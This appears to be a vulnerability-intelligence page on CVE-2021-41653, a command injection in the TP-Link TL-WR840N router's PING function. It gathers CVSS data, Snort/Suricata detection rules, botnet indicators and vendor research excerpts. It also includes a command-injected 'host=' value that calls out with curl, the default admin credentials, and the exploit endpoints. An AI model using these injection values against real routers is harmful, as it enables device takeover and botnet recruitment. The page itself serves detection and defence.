CVE-2021-41653
published 2021-11-13CVE-2021-41653: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted…
PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
77.47%
99.5th percentile
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tp-link | tl-wr840n_firmware | <= tl-wr840n\(eu\)_v5_171211 | — |
Detection & IOCsextracted from sources · hover to see the quote
cookieAuthorization=Basic YWRtaW46YWRtaW4=
path/cgi?2
path/cgi?7
commandhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
snort
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT TP-Link TL-WR840N EU v5 RCE Attempt (CVE-2021-41653)"; flow:established,to_server; http.request_line; content:"POST /cgi?2"; startswith; fast_pattern; http.request_body; content:"|5b|IPPING|5f|DIAG|23|"; nocase; content:"host="; distance:0; nocase; pcre:"/^(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/R"; reference:url,k4m1ll0.com/cve-2021-41653.html; reference:url,www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability; reference:cve,2021-41653; classtype:attempted-admin; sid:2034677; rev:2; metadata:attack_target Networking_Equipment, created_at 2021_12_11, cve CVE_2021_41653, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_11;)
- →Exploit targets POST /cgi?2 endpoint with [IPPING_DIAG#...] body block containing a command-injected 'host=' parameter; a second follow-up request is sent to POST /cgi?7 to trigger execution.
- →The Snort/ET rule (sid:2034677) detects the exploit by matching 'POST /cgi?2' in the request line combined with '[IPPING_DIAG#' and 'host=' in the body, followed by shell metacharacters (backtick, semicolon, pipe, etc.) via PCRE.
- →Exploitation requires authentication; attackers use default credentials (admin:admin, Base64: YWRtaW46YWRtaW4=) in the Authorization cookie. Monitor for login attempts with default credentials followed by POST to /cgi?2.
- →The malicious dropper script is named 'tshit.sh'; its download and execution on a TP-Link router is a strong indicator of compromise. The script also blocks connections to commonly targeted ports to prevent competing botnets.
- →MANGA/Dark Mirai payload binaries use the naming pattern 'eh.<arch>' (e.g., eh.arm5, eh.mips, eh.x86) and 'Dark.<arch>' / 'dark.<arch>'. Presence of these filenames on a Linux/IoT device indicates infection.
- →FortiGuard IPS signatures 'TP-Link.HTTP.Management.Code.Execution' and 'TP-Link.Home.Wifi.Router.CGI.Referer.Command.Injection' can generically detect this attack class.
- →Check Point IPS signature 'TP-Link TL-WR840N Router Command Injection (CVE-2021-41653)' provides network-level detection.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8fx7-hx38-cm88: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a cra
ghsa_unreviewed·2022-05-24
CVE-2021-41653 [CRITICAL] CWE-94 GHSA-8fx7-hx38-cm88: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a cra
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
VulnCheck
TP-Link tl-wr840n_firmware Improper Control of Generation of Code ('Code Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-41653 [CRITICAL] TP-Link tl-wr840n_firmware Improper Control of Generation of Code ('Code Injection')
TP-Link tl-wr840n_firmware Improper Control of Generation of Code ('Code Injection')
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
Affected: TP-Link tl-wr840n_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-41653; https://dashboard.shadowserver.org/stat
Suricata
ET EXPLOIT TP-Link TL-WR840N EU v5 RCE Attempt (CVE-2021-41653)
suricata·2021-12-11·CVSS 9.8
CVE-2021-41653 [CRITICAL] ET EXPLOIT TP-Link TL-WR840N EU v5 RCE Attempt (CVE-2021-41653)
ET EXPLOIT TP-Link TL-WR840N EU v5 RCE Attempt (CVE-2021-41653)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT TP-Link TL-WR840N EU v5 RCE Attempt (CVE-2021-41653)"; flow:established,to_server; http.request_line; content:"POST /cgi?2"; startswith; fast_pattern; http.request_body; content:"|5b|IPPING|5f|DIAG|23|"; nocase; content:"host="; distance:0; nocase; pcre:"/^(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/R"; reference:url,k4m1ll0.com/cve-2021-41653.html; reference:url,www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability; reference:cve,2021-41653; classtype:attempted-admin; sid:2034677; rev:2; metadata:attack_target Networking_Equipment, created_at 2021_12_11, cve CVE_2021_41
Nuclei
TP-Link - OS Command Injection
nuclei·CVSS 9.8
CVE-2021-41653 [CRITICAL] TP-Link - OS Command Injection
TP-Link - OS Command Injection
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
Template:
id: CVE-2021-41653
info:
name: TP-Link - OS Command Injection
author: gy741
severity: critical
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
reference
Checkpoint
13th December – Threat Intelligence Report
blogs_checkpoint·2021-12-13
CVE-2021-44228 13th December – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 13th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th December, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research warns of potential ransomware attacks as samples of Emotet are fast-spreading via Trickbot. Since the Emotet takedown 10 months ago, CPR has spotted over 140,000 victims of Trickbot, across 149 countries, which might now be converted into Emotet, providing ransomware gangs a backdoor into compromise
Fortinet
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability | FortiGuard Labs
blogs_fortinet·2021-12-08
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability
By Joie Salvio | December 08, 2021
Last week, our FortiGuard Labs team encountered a malware sample that’s currently being distributed in the wild targeting TP-link wireless routers. It leverages a recently post-authenticated RCE vulnerability released barely two weeks prior.
As it turns out, it is an updated variant of the MANGA campaign (also known as Dark) that distributes samples based on Mirai’s published source code. This Mirai-based Distributed Denial of Service (DDOS) botnet campaign is one that FortiGuard Labs has been actively monitoring. The campaign originally piqued our interest due to the continuous updating of its list of target vulnerabilities—more so than ot
Greynoiseio
Malicious Tag Roundup (January 2022)
blogs_greynoiseio
Malicious Tag Roundup (January 2022)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2021-11-13
Published
Exploited in the wild